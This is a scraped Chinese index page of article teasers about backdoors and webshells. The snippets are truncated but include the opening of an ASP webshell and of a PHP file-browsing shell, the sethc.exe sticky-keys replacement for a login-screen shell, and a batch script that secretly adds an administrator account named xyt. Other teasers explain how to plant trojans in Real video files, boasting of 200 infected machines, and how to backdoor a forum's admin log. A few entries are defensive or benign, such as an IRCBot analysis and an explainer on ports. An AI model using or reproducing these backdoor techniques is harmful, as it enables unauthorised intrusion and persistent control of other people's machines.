<% 'code by netpatchdim dbfile,sql db="netpatch.asp"dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog") ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile set ydb=nothing if err....
http://www.jb51.net//article/13615.htm
总是忘记一句话放到哪个文件里去了,直接全部干掉...[code]<?//xy7 if (!isset($dir) or empty($dir)) { $dir=str_replace('\\','/',dirname(__FILE__)); echo "<font color=\"#00688B\">".$dir."</font>"; } else { $dir=$_GET['dir']; echo "<fon...
http://www.jb51.net//article/13461.htm
后门原理: 在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。 XP: 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%\system32\dllcache ren sethc.exe *.ex~ cd %widnir%\system32 copy /y cmd...
http://www.jb51.net//article/12814.htm
病毒简介: 病毒名称:mdesvc.exe\Backdoor.Win32.IRCBot 中文别名:MSN蠕虫 文件长度:10752 byte 文件MD5:633fc2332287108885ba0633efd81601 依赖平台:Win 9X/ME/NT/2K/XP/2K3病毒分析: 1、释放病毒副本: %Systemroot%\system32\mdesvc.exe 10752 字节 2、添加注册表,开机启动: HKEY_LOCAL_MACHINE\SOFTWARE\...
http://www.jb51.net//article/12709.htm
pw的一个放后门的方式data\bbscache\admin_record.php是记录后台登陆和操作的,我们看看是怎么操作这个文件的:admin\admincp.php:$bbsrecordfile=D_P."data/bbscache/admin_record.php";if(!file_exists($bbsrecordfile)){writeover($bbsrecordfile,"<?php die;?>\n");}//这个if只是说如果不存在admin_record.php 就用代码生成一个如果我们只是编辑admin_record.php ...
http://www.jb51.net//article/12439.htm
在上网的时候,我们经常会看到“端口”这个词,也会经常用到端口号,比如在FTP地址后面增加的“21”,21就表示端口号。那么端口到底是什么意思呢?怎样查看端口号呢?下面就将介绍这方面的内容。 端口概念 在网络技术中,端口(Port)大致有两种意思:一是物理意义上的端口,比如,ADSLModem、集线器、交换机、路由器用于连接其他网络设备的接口,如RJ-45端口、SC端口等等。二是逻辑意义上的端口,一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。我们这里将要介绍的就是逻辑意义上的...
http://www.jb51.net//article/12163.htm
后门!相信这个词语对您来说一定不会陌生,它的危害不然而欲,但随着人们的安全意识逐步增强,又加上杀毒软件的"大力支持",使传统的后门无法在隐藏自己,任何稍微有点计算机知识的人,都知道"查端口""看进程",以便发现一些"蛛丝马迹"。所以,后门的编写者及时调整了思路,把目光放到了动态链接程序库上,也就是说,把后门做成DLL文件,然后由某一个EXE做为载体,或者使用Rundll32.exe来启动,这样就不会有进程,不开端口等特点,也就实现了进程、端口的隐藏。本文以"DLL的原理""DLL的清除""DLL的防范"为主题,并展开论述,旨在能让大家对DLL后门"快速上手",不再恐惧DLL后门。好了,进入我们...
http://www.jb51.net//article/10707.htm
<html><head><title>七步倒┈→专用asp后门</title></head></html><%dim objFSO%><%dim fdata%><%dim objCountFile%><%on error resume next%><%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>...
http://www.jb51.net//article/10290.htm
作者:tombkeeper pgn 来源:www.loveling.net/黑客基地本文的内容是如何利用IIS本身的一些特性建立后门。当然,这主要是一份供网络管理员和网络安全工作人员参考的“Know Your Enemy”类文档,作者希望这篇文章能够对检查和清除后门有所帮助,而并不鼓励或赞同利用本文的技巧进行违法活动。 首先简单介绍一下IIS的配置文件MetaBase.bin。这个文件位于%SystemRoot%system32inetsrvMetaBase.bin,包含了几乎所有IIS的配置信息,是非常重要的系统文件。简单的说,我们在“i...
http://www.jb51.net//article/10273.htm
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup admini...
http://www.jb51.net//article/9970.htm
在Real影片中放木马后门.遇到类是情况希望大家注意经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉! 在Real影片中放 木马 在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,安装了一个这样的小木马 ,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。 使用某个工具来修改影片的剪辑信息,可以在指定时间打开指定的窗口. 新建...
http://www.jb51.net//article/9510.htm